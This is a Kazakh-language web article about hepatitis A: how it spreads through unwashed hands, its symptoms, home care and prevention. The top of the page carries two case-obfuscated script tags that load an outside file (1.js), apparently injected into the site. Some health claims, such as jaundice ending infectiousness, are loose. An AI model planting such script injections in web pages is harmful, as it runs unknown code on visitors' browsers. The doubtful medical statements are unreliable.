<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.02.2018

А вирустық гепатит

           Көне замандағы ойшылдар: «Жуылмаған қолды шауып тастау жөн» деп,- тектен-тек айтқан жоқ. А вирустық гепатитті фекалды-оральді яғни жуылмаған қолдар ауруы деп атайды. А вирустық гепатит ең көп тараған жұқпалардың бірі. А вирустық гепатитімен ең әуелі, мектепке дейін жастағы балалар ауырады. Қол жумай жемістерді, нан мен майды жеу, ойыншықпен ойнап, саусағын ауызғу салу салдарынан жұқпаға душар болады.

Аурудың белгілері:

Жоғары температура, әлсіздік, шаршаңдық, құсу.

Баланың тері түсі сарғайса, онда жұқтыру қасиеті жойылады да бірнеше аптадан кейін А гепатитпен мәңгілікке

қоштасады. Дәрігерлердің пікірінше, гепатиттің мұндай түріне шалдыққан бала, ауруханаға қарағанда, үйде емделгені абзал. Өйткені, үйде күтім де тамақ та жақсы болады.

А вирустық гепатитті алдын алу

           Қымбатты аналар, қай заман болса да, А вирустық гепатитті алдын алудың ең оңтайлы түрі- «хош иісті сабын мен биязы сүлгі» екені ұмытпағайсыздар. Балаларыңыз тамақтанудың алдында қолын сабынмен жуып отыруын қадағалаңыз. Сондай-ақ көкөніс пен жемісті мұқият жуылып, желінсін. Балаңыз балабақшада біреудің түбегіне отырмауы жөнінде нұсқап, ақыл айтыңыз. Отбасыңызда біреу гепатитпен ауырып қалса, киімдерді, ойыншықтарды, ыдыс-аяқты хлораминмен өңдеп, жуыңыз. Естияр адамдар А гепатитімен әлдеқайда сирек ауырады.

Просмотров: 1393


Пікір қосу



Деректерді қолтаңбаға қосу